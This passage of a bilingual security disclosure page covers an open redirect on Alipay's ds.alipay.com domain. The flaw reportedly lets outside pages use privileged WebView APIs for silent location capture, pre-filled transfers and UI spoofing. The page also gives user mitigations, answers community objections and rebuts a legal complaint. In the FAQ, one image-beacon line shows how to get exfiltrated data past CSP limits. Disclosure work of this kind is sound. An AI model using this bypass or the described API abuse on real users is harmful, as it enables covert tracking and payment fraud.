<th><span class="zh">说明</span><span class="en">Description</span></th>
<th><span class="zh">防护范围</span><span class="en">Coverage</span></th>
</tr>
<tr>
<td>1</td>
<td><span class="zh"><strong>不点击陌生链接</strong></span><span class="en"><strong>Don't click unknown links</strong></span></td>
<td><span class="zh">收到含 <code>ds.alipay.com</code><code>alipays://</code> 的链接时保持警惕,尤其是来自群聊、短信、邮件的链接</span><span class="en">Be cautious with links containing <code>ds.alipay.com</code> or <code>alipays://</code>, especially from group chats, SMS, or emails</span></td>
<td><span class="zh">全部漏洞</span><span class="en">All vulnerabilities</span></td>
</tr>
<tr>
<td>2</td>
<td><span class="zh"><strong>关闭定位权限</strong></span><span class="en"><strong>Disable location permission</strong></span></td>
<td><span class="zh">在系统设置中将支付宝的定位权限改为"仅在使用时允许"或"关闭",需要时临时开启</span><span class="en">In system settings, change Alipay's location permission to "While Using" or "Off"; enable temporarily when needed</span></td>
<td><span class="zh">GPS 静默外泄</span><span class="en">Silent GPS exfiltration</span></td>
</tr>
<tr>
<td>3</td>
<td><span class="zh"><strong>验证转账信息</strong></span><span class="en"><strong>Verify transfer details</strong></span></td>
<td><span class="zh">任何弹出的转账/付款页面,务必仔细核对收款方信息,不要因为页面看起来"正常"就直接确认</span><span class="en">For any transfer/payment page that appears, carefully verify recipient information — don't confirm just because the page "looks normal"</span></td>
<td><span class="zh">转账预填攻击</span><span class="en">Transfer pre-fill attack</span></td>
</tr>
<tr>
<td>4</td>
<td><span class="zh"><strong>关闭小额免密</strong></span><span class="en"><strong>Disable small-amount password-free payments</strong></span></td>
<td><span class="zh">设置 → 支付设置 → 免密支付 → 关闭小额免密。确保每笔支付都需要密码/指纹确认</span><span class="en">Settings → Payment Settings → Password-free Payment → Disable. Ensure every payment requires password/biometric confirmation</span></td>
<td><span class="zh">支付接口调用</span><span class="en">Payment interface invocation</span></td>
</tr>
<tr>
<td>5</td>
<td><span class="zh"><strong>保持应用更新</strong></span><span class="en"><strong>Keep app updated</strong></span></td>
<td><span class="zh">如果厂商悄悄修复了部分问题(有社区反馈表明部分接口已变化),更新到最新版可获得保护</span><span class="en">If the vendor silently patches issues (community feedback suggests some APIs have changed), updating to the latest version provides protection</span></td>
<td><span class="zh">已修补的接口</span><span class="en">Patched interfaces</span></td>
</tr>
</table>
</section>
<!-- ==================== COMMUNITY FAQ ==================== -->
<section id="community-faq">
<h2><span class="num">💬</span>
<span class="zh">社区质疑回应</span>
<span class="en">Community Questions & Responses</span>
</h2>
<div class="zh">
<p>本研究在 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/4" target="_blank">GitHub</a><a href="https://www.v2ex.com/t/1198033" target="_blank">V2EX</a><a href="https://linux.do/t/topic/1746089" target="_blank">LINUX DO</a> 等平台引发了专业讨论。我们感谢所有参与技术讨论的安全从业者,并在此逐条回应主要质疑。</p>
</div>
<div class="en">
<p>This research has sparked professional discussions on <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/4" target="_blank">GitHub</a>, <a href="https://www.v2ex.com/t/1198033" target="_blank">V2EX</a>, <a href="https://linux.do/t/topic/1746089" target="_blank">LINUX DO</a> and other platforms. We thank all security professionals who participated in the technical discussion and address the main questions below.</p>
</div>
<!-- Q1: DeepLink是正常设计 -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q1「DeepLink / URL Scheme 是正常设计,不算漏洞」</span>
<span class="en">Q1: "DeepLink / URL Scheme is normal design, not a vulnerability"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">来源GitHub Issue #4 (sevck), V2EX (Puteulanus)</p>
<p><strong style="color:#4ecdc4;">我们同意:</strong>DeepLink 机制本身是移动生态的通用设计。我们从未将「DeepLink 存在」定义为漏洞。</p>
<p><strong style="color:#ff4444;">但核心问题是:</strong>支付宝自有域名 <code>ds.alipay.com</code><strong>开放重定向</strong>允许<strong>任何人</strong>通过白名单域名将<strong>任意外部页面</strong>加载到支付宝的特权 WebView 中,获得完整的 JSBridge API 访问权限。这不是「DeepLink 存在」的问题,而是<strong>安全边界被完全突破</strong></p>
<ul>
<li><a href="https://cwe.mitre.org/data/definitions/601.html" target="_blank">CWE-601 (URL重定向到不可信站点)</a> 是 OWASP Top 10 明确认定的漏洞类型</li>
<li><a href="https://cwe.mitre.org/data/definitions/939.html" target="_blank">CWE-939 (自定义URL Scheme处理器中的不当授权)</a> 也是标准漏洞分类</li>
<li><a href="https://developer.android.com/privacy-and-security/risks/unsafe-use-of-deeplinks" target="_blank">Google Android 安全文档</a>明确将 Deep Link 的不安全使用列为安全风险</li>
</ul>
<p>类比:门锁是正常设计。但如果任何人可以用一张纸条打开你家门锁,那就是门锁的安全漏洞——不是「门锁这种设计不算漏洞」。</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck), V2EX (Puteulanus)</p>
<p><strong style="color:#4ecdc4;">We agree:</strong> DeepLink is a standard mechanism in the mobile ecosystem. We never defined "the existence of DeepLink" as a vulnerability.</p>
<p><strong style="color:#ff4444;">But the core issue is:</strong> Alipay's own domain <code>ds.alipay.com</code> has an <strong>open redirect</strong> that allows <strong>anyone</strong> to load <strong>arbitrary external pages</strong> into Alipay's privileged WebView via the whitelisted domain, gaining full JSBridge API access. This is not about "DeepLink existing" — it is about the <strong>security boundary being completely breached</strong>.</p>
<ul>
<li><a href="https://cwe.mitre.org/data/definitions/601.html" target="_blank">CWE-601 (URL Redirection to Untrusted Site)</a> is explicitly classified as a vulnerability in OWASP Top 10</li>
<li><a href="https://cwe.mitre.org/data/definitions/939.html" target="_blank">CWE-939 (Improper Authorization in Handler for Custom URL Scheme)</a> is a standard vulnerability classification</li>
<li><a href="https://developer.android.com/privacy-and-security/risks/unsafe-use-of-deeplinks" target="_blank">Google Android Security docs</a> explicitly list unsafe use of Deep Links as a security risk</li>
</ul>
<p>Analogy: A door lock is a normal design. But if anyone can open your door lock with a slip of paper, that's a vulnerability in the lock — not "door locks aren't vulnerabilities."</p>
</div>
</div>
<!-- Q2: GPS已有权限 -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q2「GPS 获取在用户已授权权限的前提下是正常行为」</span>
<span class="en">Q2: "GPS access under existing user permissions is normal behavior"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">来源GitHub Issue #4 (sevck, rama2910****10)</p>
<p><strong>这是一个权限委托 vs 权限滥用的问题。</strong></p>
<table style="margin:12px 0;">
<tr><th>场景</th><th>用户期望</th><th>实际行为</th></tr>
<tr><td>用户授权支付宝使用 GPS</td><td>支付宝自身功能使用</td><td style="color:#4ecdc4;">✅ 正常</td></tr>
<tr><td>外部攻击者通过 WebView 获取 GPS</td><td>不在用户预期内</td><td style="color:#ff4444;">❌ 权限滥用</td></tr>
<tr><td>标准浏览器请求用户位置</td><td>弹窗请求确认</td><td style="color:#4ecdc4;">✅ W3C 标准行为</td></tr>
<tr><td>支付宝 WebView 中外部页面请求位置</td><td>应当弹窗确认</td><td style="color:#ff4444;">❌ 无弹窗,静默获取</td></tr>
</table>
<p>正如参与讨论的 nailchu 所指出的:<em>「我授权是授给你支付宝的,攻击方想拿就拿算怎么个事儿?就算浏览器也会跳'该网站正在请求位置信息'啊」</em></p>
<p>用户把位置权限授予支付宝,是信任<strong>支付宝</strong>——不是信任任何能够加载到支付宝 WebView 中的随机网页。当攻击者的页面可以通过白名单绕过进入 WebView 并静默调用 <code>getLocation</code>,这就是对用户信任的滥用。</p>
<p><strong>实测证据</strong>308 条服务器日志记录了从 3 台真实设备静默获取的 GPS 坐标8.8m 精度7 秒内完成0 次用户交互。GitHub Issue #5 的 freshnn 也独立确认 Android 上「无感 GPS」成功。</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck, rama2910****10)</p>
<p><strong>This is a question of permission delegation vs. permission abuse.</strong></p>
<table style="margin:12px 0;">
<tr><th>Scenario</th><th>User Expectation</th><th>Actual Behavior</th></tr>
<tr><td>User grants Alipay GPS permission</td><td>Used by Alipay's own functions</td><td style="color:#4ecdc4;">✅ Normal</td></tr>
<tr><td>External attacker accesses GPS via WebView</td><td>Not within user's expectation</td><td style="color:#ff4444;">❌ Permission abuse</td></tr>
<tr><td>Standard browser requests location</td><td>Shows confirmation dialog</td><td style="color:#4ecdc4;">✅ W3C standard</td></tr>
<tr><td>External page in Alipay WebView requests location</td><td>Should show dialog</td><td style="color:#ff4444;">❌ No dialog, silent access</td></tr>
</table>
<p>As nailchu pointed out in the discussion: <em>"I authorized Alipay, not any attacker who wants my location. Even browsers show 'This website is requesting your location.'"</em></p>
<p>When users grant location permission to Alipay, they trust <strong>Alipay</strong> — not any random webpage that can be loaded into Alipay's WebView. When an attacker's page enters the WebView via whitelist bypass and silently calls <code>getLocation</code>, this is an abuse of user trust.</p>
<p><strong>Evidence</strong>: 308 server log entries documenting GPS coordinates silently obtained from 3 real devices (8.8m accuracy), completed in 7 seconds, with 0 user interactions. freshnn on GitHub Issue #5 also independently confirmed "silent GPS" works on Android.</p>
</div>
</div>
<!-- Q3: 转账预填需确认 -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q3「转账预填需要用户确认类似 Chrome 表单预填」</span>
<span class="en">Q3: "Transfer pre-fill requires user confirmation, similar to Chrome form auto-fill"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">来源GitHub Issue #4 (sevck, rama2910****10)</p>
<p><strong style="color:#4ecdc4;">我们部分同意:</strong>转账确实需要用户至少 2 次点击 + 密码/生物认证确认,不能自动完成。本报告已在相关章节明确标注此前提条件。</p>
<p><strong style="color:#ff8800;">但 Chrome 类比不准确:</strong></p>
<ul>
<li>Chrome 预填的是<strong>用户自己保存的</strong>表单数据 — 攻击者无法指定预填内容</li>
<li>支付宝的预填是<strong>攻击者通过 URL 参数指定</strong>收款账号和金额 — 性质完全不同</li>
<li>结合 UI 欺骗能力(<code>setTitle</code>/<code>showToast</code>),攻击者可以伪造合法转账理由,降低用户警惕</li>
</ul>
<p>参与讨论的 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/4" target="_blank">cxxsheng</a> 独立编写了 PoC结论<em>「还是认为这个功能是漏洞,但是危害性会低一些」</em>。他还引用了 <a href="https://github.com/advisories/GHSA-88q7-6vxh-w5q7" target="_blank">CVE-2024-40676</a>Android 先例):减少用户交互步骤本身可以构成漏洞。</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck, rama2910****10)</p>
<p><strong style="color:#4ecdc4;">We partially agree:</strong> Transfers indeed require at least 2 clicks + password/biometric confirmation and cannot complete automatically. This precondition is already explicitly stated in the relevant sections of this report.</p>
<p><strong style="color:#ff8800;">But the Chrome analogy is inaccurate:</strong></p>
<ul>
<li>Chrome auto-fills data <strong>previously saved by the user</strong> — attackers cannot specify the pre-filled content</li>
<li>Alipay's pre-fill is <strong>specified by the attacker via URL parameters</strong> for recipient account and amount — fundamentally different</li>
<li>Combined with UI spoofing (<code>setTitle</code>/<code>showToast</code>), attackers can fabricate legitimate-looking transfer reasons, reducing user vigilance</li>
</ul>
<p><a href="https://github.com/sgInnora/alipay-deeplink-research/issues/4" target="_blank">cxxsheng</a> independently wrote a PoC and concluded: <em>"I still consider this a vulnerability, but with lower severity."</em> He also cited <a href="https://github.com/advisories/GHSA-88q7-6vxh-w5q7" target="_blank">CVE-2024-40676</a> (Android precedent): reducing user interaction steps itself can constitute a vulnerability.</p>
</div>
</div>
<!-- Q4: iOS复现失败 -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q4「iOS 上无法复现数据外泄」</span>
<span class="en">Q4: "Cannot reproduce data exfiltration on iOS"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">来源GitHub Issue #5 (freshnn)</p>
<p>freshnn 报告 iOS 可以调用并打开相关页面但服务端收不到数据Android 上「无感 GPS」则复现成功。</p>
<p><strong>可能原因:</strong></p>
<ul>
<li><strong>HTTPS 混合内容阻止</strong> — 如果 PoC 页面在 HTTPS 的支付宝 WebView 中加载,而数据外传目标是 HTTPWKWebView 会直接阻止请求发出(注意:这会阻止 request 本身,不只是 response</li>
<li><strong>CSP connect-src 限制</strong> — 支付宝 WebView 可能设置了 CSP 的 <code>connect-src</code> 指令,阻止向外部域发送请求</li>
<li><strong>解决方案</strong> — 使用 Image beacon<code>new Image().src = "https://server/log?data=..."</code>)属于 simple request 且不受 <code>connect-src</code> 限制</li>
<li><strong>支付宝版本差异</strong> — 不同版本的 JSBridge 鉴权策略可能不同,建议使用最新版测试</li>
</ul>
<p style="color:#9898a8;font-size:13px;"><em>技术修正:感谢 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5#issuecomment-4060****30" target="_blank">meooxx</a> 指出 CORS 是浏览器端策略——它阻止的是浏览器读取 response不阻止 request 到达服务器。对于 simple request服务器一定会收到请求。</em></p>
<p><strong>关键事实:</strong>我们的 iPhone 16 Pro (iOS 18.3) 测试<strong>确实成功</strong>获取了 GPS 数据(记录在服务器日志中),蚂蚁集团安全负责人的 iPhone 在杭州的测试也被我们成功获取了坐标。iOS 复现需要满足特定的服务器配置条件,并非漏洞不存在。</p>
<p>我们将在 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a> 中提供详细的 iOS 复现排查指南。</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #5 (freshnn)</p>
<p>freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.</p>
<p><strong>Possible causes:</strong></p>
<ul>
<li><strong>HTTPS mixed content blocking</strong> — If the PoC page loads in Alipay's HTTPS WebView but the exfiltration target is HTTP, WKWebView will block the request entirely (this blocks the request itself, not just the response)</li>
<li><strong>CSP connect-src restriction</strong> — Alipay's WebView may set CSP <code>connect-src</code> directives that block requests to external domains</li>
<li><strong>Solution</strong> — Use Image beacon (<code>new Image().src = "https://server/log?data=..."</code>) which is a simple request not restricted by <code>connect-src</code></li>
<li><strong>Alipay version differences</strong> — Different versions may have different JSBridge authentication policies; test with the latest version</li>
</ul>
<p style="color:#9898a8;font-size:13px;"><em>Technical correction: Thanks to <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5#issuecomment-4060****30" target="_blank">meooxx</a> for pointing out that CORS is a browser-side policy — it blocks the browser from reading the response, not the request from reaching the server. For simple requests, the server always receives the request.</em></p>
<p><strong>Key fact:</strong> Our iPhone 16 Pro (iOS 18.3) test <strong>did successfully</strong> obtain GPS data (recorded in server logs). Ant Group's security lead's iPhone in Hangzhou was also successfully captured. iOS reproduction requires specific server configuration — the vulnerability exists, but the PoC setup matters.</p>
<p>We will provide a detailed iOS reproduction troubleshooting guide in <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a>.</p>
</div>
</div>
<!-- Q5: 支付宝WebView vs 标准浏览器 -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q5「这是浏览器通用设计问题不是支付宝特有问题」</span>
<span class="en">Q5: "This is a general browser design issue, not specific to Alipay"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">来源V2EX (Puteulanus)</p>
<p><strong>支付宝 WebView ≠ 标准浏览器。</strong>关键区别:</p>
<table style="margin:12px 0;">
<tr><th>能力</th><th>标准浏览器</th><th>支付宝 WebView (Nebula)</th></tr>
<tr><td>位置请求</td><td style="color:#4ecdc4;">弹窗确认</td><td style="color:#ff4444;">静默获取</td></tr>
<tr><td>支付接口</td><td style="color:#4ecdc4;"></td><td style="color:#ff4444;">tradePay 可调用</td></tr>
<tr><td>内部页面导航</td><td style="color:#4ecdc4;"></td><td style="color:#ff4444;">startApp 可跳转敏感页面</td></tr>
<tr><td>设备指纹</td><td>标准 User-Agent</td><td style="color:#ff4444;">IMEI/品牌/型号/运营商</td></tr>
<tr><td>UI 控制</td><td style="color:#4ecdc4;">受限</td><td style="color:#ff4444;">setTitle/showToast 可伪造</td></tr>
</table>
<p>白名单的存在本身就证明支付宝<strong>自己认为</strong>需要限制哪些页面可以访问这些特权 API。绕过白名单 = 绕过<strong>支付宝自己设定的安全边界</strong></p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: V2EX (Puteulanus)</p>
<p><strong>Alipay WebView ≠ standard browser.</strong> Key differences:</p>
<table style="margin:12px 0;">
<tr><th>Capability</th><th>Standard Browser</th><th>Alipay WebView (Nebula)</th></tr>
<tr><td>Location request</td><td style="color:#4ecdc4;">Confirmation dialog</td><td style="color:#ff4444;">Silent access</td></tr>
<tr><td>Payment API</td><td style="color:#4ecdc4;">None</td><td style="color:#ff4444;">tradePay callable</td></tr>
<tr><td>Internal navigation</td><td style="color:#4ecdc4;">None</td><td style="color:#ff4444;">startApp navigates to sensitive pages</td></tr>
<tr><td>Device fingerprint</td><td>Standard User-Agent</td><td style="color:#ff4444;">IMEI/Brand/Model/Carrier</td></tr>
<tr><td>UI control</td><td style="color:#4ecdc4;">Limited</td><td style="color:#ff4444;">setTitle/showToast spoofable</td></tr>
</table>
<p>The very existence of the whitelist proves that Alipay <strong>itself recognizes</strong> the need to restrict which pages can access these privileged APIs. Bypassing the whitelist = bypassing <strong>Alipay's own security boundary</strong>.</p>
</div>
</div>
<!-- Q6: 独立验证背书 -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">独立验证与机构背书</span>
<span class="en">Independent Verification & Institutional Recognition</span>
</h3>
<div class="zh">
<p>本研究的有效性已获得多个独立第三方的验证:</p>
<ul>
<li><strong>Packet Storm Security</strong> — 审核通过并发布 <a href="https://packetstormsecurity.com/files/217089" target="_blank">Advisory #217089</a></li>
<li><strong>MITRE</strong> — 受理 36 个 CVE 申请 (11 tickets)</li>
<li><strong>Apple Product Security</strong> — 主动启动调查 (Case OE0105****3014)</li>
<li><strong>Google Play</strong> — 启动政策违规调查 (Case 9-7515****0640)</li>
<li><strong>CSSF 卢森堡</strong> — 4 个部门确认收到ICT Risk Supervision 明确记录</li>
<li><strong>PDPC 新加坡</strong> — 启动正式数据保护调查 (#006****24)</li>
<li><strong>CIRCL 卢森堡 CERT</strong> — 事件处理人员主动代为联系 Alibaba SRC</li>
<li><strong>HKMA 香港金管局</strong> — 立案调查 (Case CE2026****5412)</li>
<li><strong>cxxsheng</strong>GitHub 安全研究者)— 独立编写 PoC 后确认漏洞存在</li>
<li><strong>freshnn</strong>GitHub 用户)— 独立确认 Android 无感 GPS 复现成功</li>
</ul>
</div>
<div class="en">
<p>The validity of this research has been verified by multiple independent third parties:</p>
<ul>
<li><strong>Packet Storm Security</strong> — Reviewed and published <a href="https://packetstormsecurity.com/files/217089" target="_blank">Advisory #217089</a></li>
<li><strong>MITRE</strong> — 36 CVE submissions across 11 tickets acknowledged</li>
<li><strong>Apple Product Security</strong> — Proactively launched investigation (Case OE0105****3014)</li>
<li><strong>Google Play</strong> — Policy violation investigation (Case 9-7515****0640)</li>
<li><strong>CSSF Luxembourg</strong> — 4 departments confirmed receipt, ICT Risk Supervision explicitly noted</li>
<li><strong>PDPC Singapore</strong> — Formal data protection investigation (#006****24)</li>
<li><strong>CIRCL Luxembourg CERT</strong> — Incident handler proactively contacted Alibaba SRC on our behalf</li>
<li><strong>HKMA Hong Kong</strong> — Case filed (CE2026****5412)</li>
<li><strong>cxxsheng</strong> (GitHub researcher) — Independently wrote PoC and confirmed vulnerability exists</li>
<li><strong>freshnn</strong> (GitHub user) — Independently confirmed silent GPS reproduction on Android</li>
</ul>
</div>
</div>
</section>
<!-- ==================== LEGAL RESPONSE ==================== -->
<section id="legal-response">
<h2><span class="num">⚖️</span>
<span class="zh">法律投诉回应</span>
<span class="en">Legal Complaint Response</span>
</h2>
<div class="zh">
<div class="callout" style="border-left:4px solid var(--accent);background:rgba(255,68,68,.08);padding:20px;border-radius:0 8px 8px 0;margin-bottom:24px;">
<p style="margin-bottom:12px;"><strong>投诉单号:</strong>[已隐藏]</p>
<p style="margin-bottom:12px;"><strong>投诉时间:</strong>2026-03-11 22:45:59文章发布仅4小时29分钟后</p>
<p style="margin-bottom:12px;"><strong>投诉方:</strong>北京格韵律师事务所(证件号 31110000MD0196493T</p>
<p style="margin-bottom:12px;"><strong>投诉分类:</strong>内容侵犯名誉/商誉/隐私/肖像</p>
<p style="margin-bottom:0;"><strong>投诉平台:</strong>微信公众平台</p>
</div>
<h3>我们的立场:投诉不成立</h3>
<p><strong>1. 文章未指名任何企业</strong> — 我们在微信公众号发布的文章全文零次出现"支付宝""Alipay""蚂蚁集团"或任何可识别特定企业的名称。根据《民法典》第1024条名誉权/商誉侵权需满足"针对特定主体"的构成要件。投诉方通过主动投诉,反而自行确认了文章内容与其委托人的关联性。</p>
<p><strong>2. 内容属实且有完整证据链</strong> — 根据《民法典》第1025条行为人为公共利益实施舆论监督影响他人名誉的不承担民事责任前提是内容属实且未超出合理限度。我们的文章基于308条服务器日志、3台真实设备测试、42张截图。所有结论均可独立复现验证。</p>
<p><strong>3. 厂商安全团队亲自验证了漏洞</strong> — 在私下报告阶段,厂商安全团队指派业务负责人与我们协同验证。该人员使用自有 iPhone 16 Pro 在杭州测试时GPS 坐标被直接回传至我们的服务器,<strong>全程无任何 GPS 授权弹窗</strong>。这直接推翻了投诉方"调用位置权限均以弹窗告知用户"的主张。此次验证还发现 iOS 版本攻击面显著大于 Android——额外暴露 tradePay支付SDK、share蠕虫传播等 5 个敏感 API。</p>
<p><strong>4. 厂商自身定性消除侵权基础</strong> — 厂商安全团队在亲自验证上述事实后仍于2026年3月10日回复"这些属于正常功能"。讨论一款应用的"正常功能"从逻辑上不可能构成"商誉侵权"。当企业明知风险存在而选择不修复,再通过法律手段阻止公众知情——这不是维权,这是掩盖。</p>
<p><strong>5. 消费者知情权</strong> — 《消费者权益保护法》第八条规定消费者享有知悉其购买、使用的商品或者接受的服务的真实情况的权利。当10亿+用户的支付工具存在可被外部链接利用的功能设计时,安全研究和公众讨论属于正当行使公共监督权。</p>
<p><strong>6. 负责任披露程序完整合规</strong> — 我们在公开前进行了4轮私下报告2026-02-25至2026-03-07等待厂商回应至明确答复"正常功能"。参照 ISO/IEC 29147:2018 和 Google Project Zero 90天标准我们的程序完全合规。</p>
<p>我们已向微信公众平台提交完整申诉材料。如投诉方对技术事实有异议,欢迎通过第三方技术鉴定机构验证。</p>
<p style="font-size:14px;color:var(--text2);margin-top:20px;"><strong>详细反驳文章:</strong><a href="https://innora.ai/zfb/rebuttal.html">支付宝安全研究遭律师函投诉——一篇零次提及"支付宝"的文章如何构成"商誉侵权"</a></p>
</div>
<div class="en">
<div class="callout" style="border-left:4px solid var(--accent);background:rgba(255,68,68,.08);padding:20px;border-radius:0 8px 8px 0;margin-bottom:24px;">
<p style="margin-bottom:12px;"><strong>Complaint #:</strong> [redacted]</p>
<p style="margin-bottom:12px;"><strong>Filed:</strong> 2026-03-11 22:45:59 (only 4 hours 29 minutes after article publication)</p>
<p style="margin-bottom:12px;"><strong>Complainant:</strong> Beijing Geyun Law Firm (License: 31110000MD0196493T)</p>
<p style="margin-bottom:12px;"><strong>Category:</strong> Content infringing reputation/goodwill/privacy/likeness</p>
<p style="margin-bottom:0;"><strong>Platform:</strong> WeChat Official Account Platform</p>
</div>
<h3>Our Position: The Complaint Has No Merit</h3>
<p><strong>1. The article names no company</strong> — Our WeChat article contains zero mentions of "Alipay," "支付宝," "Ant Group," or any identifiable corporate name. Under PRC Civil Code Article 1024, reputation infringement requires targeting a "specific subject." By filing this complaint, the complainant effectively self-identified their client as the article's subject.</p>
<p><strong>2. All content is factual and evidence-backed</strong> — Under PRC Civil Code Article 1025, one shall not bear civil liability for supervising public interest when the content is truthful and does not exceed reasonable limits. Our article is based on 308 server logs, testing across 3 real devices, and 42 screenshots. All findings are independently reproducible.</p>
<p><strong>3. The vendor's own security team verified the vulnerability</strong> — During the private reporting phase, the vendor assigned a security business lead to coordinate and verify our findings. When this person tested on their own iPhone 16 Pro in Hangzhou, GPS coordinates were transmitted directly to our server with <strong>no authorization prompt whatsoever</strong>. This directly contradicts the complainant's claim that "location access always prompts the user." This verification also revealed that the iOS attack surface is significantly larger than Android — exposing 5 additional sensitive APIs including tradePay (payment SDK) and share (worm propagation vector).</p>
<p><strong>4. The vendor's own classification eliminates infringement</strong> — After personally verifying all the above facts, the vendor's security team still responded on 2026-03-10: "These are normal features." Discussing an app's "normal features" cannot logically constitute "reputation infringement." When a company knowingly ignores verified risks and then uses legal means to suppress public awareness — that is not rights protection, it is concealment.</p>
<p><strong>5. Consumer right to know</strong> — PRC Consumer Rights Protection Law Article 8 guarantees consumers the right to know the true conditions of products and services they use. When a payment tool used by 1B+ users has features exploitable via external links, security research and public discussion serve the legitimate public interest.</p>
<p><strong>6. Responsible disclosure fully compliant</strong> — We submitted 4 rounds of private reports (2026-02-25 to 2026-03-07) before public disclosure. We waited for the vendor's explicit response ("normal features"). Per ISO/IEC 29147:2018 and Google Project Zero's 90-day standard, our process is fully compliant.</p>
<p>We have submitted complete appeal materials to the WeChat platform. If the complainant disputes the technical facts, we welcome verification through an independent third-party technical assessment.</p>
<p style="font-size:14px;color:var(--text2);margin-top:20px;"><strong>Full rebuttal article:</strong> <a href="https://innora.ai/zfb/rebuttal.html">How Can an Article That Never Mentions "Alipay" Constitute "Reputation Infringement"?</a></p>
</div>
</section>
<!-- ==================== DISCLAIMER ==================== -->
<section>
<h2>
<span class="zh">法律声明与免责</span>
<span class="en">Legal Notice & Disclaimer</span>
</h2>
<div class="callout info">
<div class="zh">
<h3 style="margin-top:0;">研究性质声明</h3>
<ul>
<li>本研究完全出于安全研究和教育目的,符合《宪法》第四十七条规定的科学研究自由。</li>
<li>所有测试均在研究者自己的设备和自有账户上进行,未对任何第三方系统造成损害。</li>
<li>研究团队为独立安全研究机构,不从事支付业务,与任何竞品企业不存在商业利益关系。</li>
</ul>
<h3>负责任披露合规声明</h3>
<ul>
<li>在公开发布之前已通过4轮私下报告2026-02-25至2026-03-07向厂商提交全部发现及修复建议。</li>
<li>厂商于2026-03-10正式回复"属于正常功能",明确拒绝修复。</li>
<li>研究者在厂商明确关闭对话后公开研究结果,符合 ISO/IEC 29147:2018 负责任披露标准。</li>
<li>公开内容均为厂商已知的技术事实,不构成"未经授权发布网络安全信息"《网络安全法》第26条</li>
</ul>
<h3>法律依据</h3>
<ul>
<li><strong>《民法典》第1025条</strong>:为公共利益实施舆论监督,内容属实且未超出合理限度的,不承担民事责任。</li>
<li><strong>《消费者权益保护法》第8条</strong>:消费者享有知悉其使用的服务真实情况的权利。</li>
<li><strong>《民法典》第1024条</strong>:名誉权侵权需针对特定主体——本文未指名任何企业。</li>
<li><strong>CVSS 3.1</strong>:国际通用漏洞评分体系明确认定"需用户交互"的安全问题仍属有效安全发现。</li>
</ul>
<h3>内容安全声明</h3>
<ul>
<li>本文不包含任何可直接用于攻击的完整 PoC 代码(关键参数已脱敏)。</li>
<li>在线演示页面为只读展示,已禁用全部数据外传功能。</li>
<li>我们对每个发现都诚实标注了验证状态,包括防护生效的部分。</li>
<li>文章中涉及资金操作的描述均明确注明"仍需用户手动确认"。</li>
</ul>
</div>
<div class="en">
<h3 style="margin-top:0;">Research Nature Statement</h3>
<ul>
<li>This research was conducted solely for security research and educational purposes, in accordance with the freedom of scientific research guaranteed by Article 47 of the PRC Constitution.</li>
<li>All testing was performed on the researcher's own devices and accounts. No third-party systems were harmed.</li>
<li>The research team is an independent security research institution with no payment business and no commercial interest with any competing enterprise.</li>
</ul>
<h3>Responsible Disclosure Compliance</h3>
<ul>
<li>All findings and remediation suggestions were submitted to the vendor through 4 rounds of private reports (2026-02-25 to 2026-03-07) before any public disclosure.</li>
<li>The vendor officially responded on 2026-03-10 with "normal functionality," explicitly declining to remediate.</li>
<li>Public disclosure occurred only after the vendor explicitly closed the dialogue, in compliance with ISO/IEC 29147:2018 responsible disclosure standards.</li>
<li>Published content covers only technical facts already known to the vendor and does not constitute "unauthorized publication of cybersecurity information" (Cybersecurity Law Article 26).</li>
</ul>
<h3>Legal Basis</h3>
<ul>
<li><strong>PRC Civil Code Article 1025</strong>: One shall not bear civil liability for supervising public interest when content is truthful and does not exceed reasonable limits.</li>
<li><strong>Consumer Rights Protection Law Article 8</strong>: Consumers have the right to know the true conditions of services they use.</li>
<li><strong>PRC Civil Code Article 1024</strong>: Reputation infringement requires targeting a specific subject — this article names no company.</li>
<li><strong>CVSS 3.1</strong>: The international vulnerability scoring system explicitly recognizes "user interaction required" findings as valid security issues.</li>
</ul>
<h3>Content Safety Statement</h3>
<ul>
